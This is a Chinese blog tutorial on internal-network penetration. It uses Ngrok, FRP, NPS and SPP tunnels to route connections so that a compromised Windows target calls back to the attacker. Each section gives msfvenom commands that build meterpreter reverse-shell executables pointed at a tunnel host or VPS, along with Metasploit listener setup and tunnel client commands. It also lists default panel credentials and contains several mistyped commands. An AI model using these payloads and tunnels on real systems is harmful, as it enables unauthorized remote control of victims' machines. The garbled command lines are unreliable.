内网穿透FRP&NPS&SPP&Ngrok

最新推荐文章于 2024-05-15 13:19:42 发布
最新推荐文章于 2024-05-15 13:19:42 发布
阅读量1.1k 收藏 21
点赞数 16
文章标签: 安全 网络安全 数据库 网络 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74806534/article/details/137409910
版权

目录

穿透上线 FRP&NPS&SPP&Ngrok

Ngrok上线

frp上线

nps上线

spp特殊协议上线

穿透上线 FRP&NPS&SPP&Ngrok

主要目的是:实现在自己内网攻击机,去攻击另一个内网的靶机

让一个内网靶机主动连接我们的内网攻击机

image-20240405130627428

Ngrok上线

首先是在Ngrok官网创建账号,然后实名认证,再到开通隧道下,开通免费的服务器

image-20240402215512882

开通后,主要是三种协议可以选择,我们选择tcp,更加稳定,隧道名称都行,远程端口选择可用端口,本地端口选择本地kali攻击机ip端口

image-20240402220241311

此时查看状态是不在线,现在下载客户端

image-20240402220326180

下载kali对应的版本

image-20240402220456186

然后解压缩,放在kali下运行

image-20240402220732419

运行命令

./sunny clientid 220259426525 //控制端连接 Ngrok 的服务器

image-20240402220920317

后面是隧道id

运行,成功上线,公网域名被解析到内网ip下

image-20240402221050429

回到网站,查看状态发现是上线状态

image-20240402221151635

接下来就是靶机上线过程

现在kali用msf生成exe上线文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=10218  -f exe -o tcp.exe

其中反向传的流量给ngrok的给的ip

因为只有这样才能靶机被访问到,然后解析到攻击机内网ip下

image-20240402222212687

然后再卡里开监听服务

msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 2223
run

image-20240402223309924

到内网靶机上运行tcp.exe文件上线,成功上线

image-20240402223347447

frp上线

frp 是一种快速反向代理,允许您将位于 NAT 或防火墙后面的本地服务器公开给 Internet。它目前支持 TCPUDP,以及 HTTPHTTPS 协议,支持通过域名将请求转发到内部服务。

思路和上面差不多,就是换成自己的服务器搭建frp

先是下载frp文件Releases · fatedier/frp (github.com)下载liunx版本

在自己的服务器上操作,我看其他师傅是要配置frp.ini文件可是我现在的版本没有ini文件,但是有.toml文件,运行默认是7000端口

image-20240405140321760

然后kali上,vim frpc.toml

其中serveraddr就是刚刚运行的服务器地址,连接刚刚配置的7000端口

下面的配置就是通过kali的6000端口连接服务器,转发到本地的5000端口,使用tcp协议

image-20240405141641620

运行命令

./frpc -c frpc.toml

image-20240405142223083

此时服务器收到kali的请求,变成跳板机

image-20240405142322919

现在kali使用msf生成木马,ip是跳板机ip,端口是6000

msfvenom -p windows/meterpreter/reverse_tcp lhost=《vps-ip》 lport=6000  -f exe -o frp.exe

接下来,kali设置监听,靶机运行exe文件,我这里5555被占用,把之前的配置换成了1234,成功上线

image-20240405143843896

注意:这里所有的但是靶机和kali主动连接服务器跳板机,所以靶机反向连接跳板机,kali正向连接跳板机,跳板机没办法转发给kali数据,只有kali去拿数据,因为在内网环境

nps上线

全面的协议支持,兼容几乎所有常用的协议,如tcp、udp、http(s)、socks5、p2p、http代理...

下载这俩Releases · ehang-io/nps (github.com)

image-20240405150050899

前提是80端口不能被占用,这个测试这次没有成功提供一个思路,调试好我再更新 具体看这个师傅【内网安全-隧道搭建】内网穿透Nps配置、上线nps 文件访问怎么配置-CSDN博客

服务端启动

./nps instal1
./nps

浏览器访问http://ip:8024账号密码admin/123

image-20240405172735456

2、创建客户端,生成密匙 3、添加协议隧道,绑定指向 远程绑定555s,指向本地6666 客户端: 1、连接服务端:

./npc -server=<vps-ip>:8024 -vkey=uajwhbu9155qh89v

2、生成后门:

msfvenom -p windowe/meterpreter/reverse_tcP1host=vps-ip lpoxt=5555 -f exe -o nps.exe

3、监听后门:

use exploit/multi/handler
set payload windows/meterprecer/reverse_tep
set LHOST 0.0.0.0
set LPORT 6666
run

运行即可上线

spp特殊协议上线

支持的协议:tcp、udp、udp、icmp、http、kcp、guic

支持的类型:正向代理、反向代理、socks5正向代理、3ocks5反向代理

在对抗项目中有遇到过一些极端环境,比如目标封了tcp,htte等常用出网的协议,但是icmg,dns等协议可能因为业务需要或者管理者安全意识不到位导致没有封干净。在这种场景下就可以使用这些容易被忽视的协议进行隧道的搭建。

先下载项目Releases · esrrhs/spp (github.com)

image-20240405164830499

实操

1、服务端:监听本地的icmc数据

./spp -type server -proto ricmp -listen 0.0.0.0

image-20240405162650551

2、客户端:将本地的8082给到服务端这8081上(上tcp封装icmp),这里是windous主机

spp -name "test" -type proxy_client -server <vps-ip> -fromaddr :8082 -toaddr :8081 -proxyproto tcp -proto ricmp

image-20240405163531537

然后关闭防火墙的tcp协议,前面的文章讲过怎么设置

然后启动服务端的cs

设置俩监听端口sp-1是接受靶机发来的到服务端的8081

image-20240405163820051

sp-1是靶机tcp发给靶机自己的端口8082在通过spp封装成icmp转发给服务器的8081,因此生成的exe文件监听器是sp-2

image-20240405164243754

接着生成本地的木马

image-20240405164443405

image-20240405164710772

运行,成功上线

image-20240405164728937

除了icmp还有其他协议,操作方法大差不差

小小邵同学
关注
  • 16
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
红队内攻防渗透:内渗透之内对抗:隧道技术篇&防火墙组策略&FRP&NPS&Chisel&Socks代理&端口映射&C2上线
HACKONE的博客
06-21 632
目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内站、本地支付接口调试、ssh访问、远程桌面,DNS解析等),此外还支持内http代理、内socks5代理、p2p等,并带有功能强大的web管理端。Frp是专注于内穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS等多种协议。服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)建立客户端连接服务端后将141上5555给到服务端6666上。服务端启动:frps -c frps.ini。
介绍个好用的内穿透工具:nps
01-09
最早开始接触内穿透,是在调试微信支付的时候,微信需要回调一个公地址,经过一番搜索,我选用了 natapp,优点是有免费隧道,缺点是公域名和端口是随机分配的,偶尔调试用下还可以。 后来,因为要映射公司和...
穿透工具nps和frp
架构师与哈苏
03-24 8013
nps https://github.com/cnlh/nps 免费,nps 的优势在于有一套官方提供的web管理端。 service端在云上搭建。 ip:8080 登陆service,账号:admin 密码:123 client端搭建在内机器上。 startClient.sh #!/bin/bash nohup ./npc -server=公ip:8024 -vkey=唯一验证密钥...
【内安全】 隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目
今天是几号的博客
03-23 1354
推荐 相当于自己管理整个平台很方便nps是一款轻量级、高性能、功能强大的内穿透代理服务器。目前支持tcp、udp流量转发,可支持任何tcp、udp上层协议(访问内站、本地支付接口调试、ssh访问、远程桌面,内dns解析等等……),此外还支持内http代理、内socks5代理、p2p等,并带有功能强大的web管理端。
p70 内安全-域横向内漫游 Socks 代理隧道技术(NPS、FRP、CFS 三层内漫游)
weixin_43263566的博客
05-03 3311
安全-域横向内漫游 Socks 代理隧道技术(NPS、FRP、CFS 三层内漫游)
安全-隧道搭建&穿透上线&FRP&NPS&Ngrok
m0_65336233的博客
12-23 2307
安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok
这里列举了一些比较好用的开源的内穿透工具,详细介绍一下各个软件工具的特点
akatale的博客
08-21 2434
轻量级的内穿透工具,客户端采用 GO 语言和 Java 语言实现两种版本,采用了 Java 络框架 netty,服务端界面体验较差。轻量级的内穿透工具,holer 服务端采用 Java 语言实现,服务端界面漂亮简洁。FRP 功能完整,主要采用 GO 语言实现,重量级的工具,服务端界面样式风格一般。配置繁琐,不同的协议需要配置不同的参数,采用文件存放数据,不支持数据库管理数据。支持的协议最广泛,配置稍简单,采用文件存放数据,不支持数据库管理数据。配置稍繁琐,采用文件存放数据,不支持数据库管理数据。
常见内穿透工具,收好了!
2302_76672693的博客
08-22 895
常见内穿透工具,收好了!
SSH端口转发实现内穿透的实现
09-14
主要介绍了SSH端口转发实现内穿透的实现,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
穿透工具
07-05
穿透工具。不懂可以问我,教你怎么使用。
比frp还简单易用的内穿透工具
01-18
NPS(Network Port Shield)内穿透工具是一个高效、易用的代理服务器,设计用于解决内服务对外部络的可达性问题。它允许外部络的请求通过NPS服务器转发到内中的特定服务器,从而实现远程访问内资源。NPS...
Docker 使用NPS在服务器搭建内穿透服务
01-11
使用NPS在服务器搭建内穿透服务
EW、FRP、NPS内穿透实验
razorx的博客
01-14 1万+
穿透实验一、EarthWorm1.建立通信2.配置隧道代理3.连接远程桌面二、FRP1.下载及配置两端的ini配置文件2.建立连接3.访问FRP服务端web管理页面4.转发内机器的ssh服务5.连接远程桌面三、NPS1.下载服务端和客户端并解压2.服务端安装并启动3.新增客户端连接4.客户端主动连接5.创建tunnel隧道6.访问远程桌面四、总结五、参考文章 免责声明:本文章仅用于学习交流...
穿透NPS,企业级应用
loool_的博客
08-19 3055
前面已经说了frp内穿透工具的使用 nps相比frp更安全,支持客户端单独key,支持api等,管理控制台相对内容更丰富 个人觉得都是一个套路,包括配置文件都很相似,至于选择什么看具体什么需求 个人使用,单机的话还是frp简单,更容易操作 下载地址: https://github.com/ehang-io/nps 安装教程请参考: https://blog.csdn.net/superDE009/article/details/99700179 ...
安全-隧道搭建&穿透上线&FRP&NPS&SPP&Ngrok&EW项目
最新发布
qq_43583125的博客
05-15 992
旨在代理连接肉鸡后实现本地渗透肉鸡络架构穿透项目:Ngrok Frp Spp Nps EW(停更)优点:穿透加密数据,中间平台,防追踪,解决络问题。
隐藏通信隧道技术:内穿透工具 nps
有勇气的牛排博客
02-09 7478
1 nps工具介绍 NPS工具是一款使用go语言编写的轻量级、功能强大的内穿透工具。支持TCP、UDP流量转发,支持内HTTP、SOCKS5代理,同时支持snappy压缩(节省带宽和流量)、站点保护、加密传输、多路复用、header修改等。同时还支持web图形化管理。该工具使用简单,相比于FRP,NPS是图形化界面,因此配置更加简单。 nps同frp工作原理相似。 官方文档: https://ehang-io.github.io/nps/#/api https://ehang-io.github.io/
穿透工具比较(ngrok,frp,lanproxy,goproxy,nps)
热门推荐
a1035434631的博客
08-14 2万+
穿透工具比较(ngrok,frp,lanproxy,goproxy,nps) 从是否有API,客户端单独key,子域名,收费模式,采用语言,github stars多个维度比较了ngrok, frp, lanproxy, goproxy, nps几款内穿透工具 ngrok https://github.com/inconshreveable/ngrok frp https://github.com/fatedier/frp lanproxy https://github.com/ff
4、内安全-隧道&内穿透上线&Ngrok&FRP&NPS&SPP&EW项目
Karka_的博客
02-21 1165
用途:个人在线笔记,有所借鉴,欢迎指正。
nps内穿透实验连接外
03-20
NPS(内穿透)是一种将内服务暴露到外的技术,可以实现通过公访问内中的服务。下面是一种常见的NPS内穿透实验连接外的步骤: 1. 安装和配置NPS服务器:首先,在外服务器上安装和配置NPS服务器。NPS服务器是一个中转服务器,用于接收来自外的请求并将其转发到内中的目标服务。 2. 配置内服务器:在内服务器上安装并配置NPS客户端。NPS客户端会与NPS服务器建立连接,并将内服务注册到NPS服务器上。 3. 配置端口映射:在NPS服务器上配置端口映射规则,将外请求的端口映射到内服务器上的对应端口。这样,当外用户访问NPS服务器上的指定端口时,请求会被转发到内服务器上的对应端口。 4. 测试连接:在外环境下,使用外IP地址和映射的端口访问NPS服务器。如果一切配置正确,请求将会被转发到内服务器上,并可以正常访问内服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值